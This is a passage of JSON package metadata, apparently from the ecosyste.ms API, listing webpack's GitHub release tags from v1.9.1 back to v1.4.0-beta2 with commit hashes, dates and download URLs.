epositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/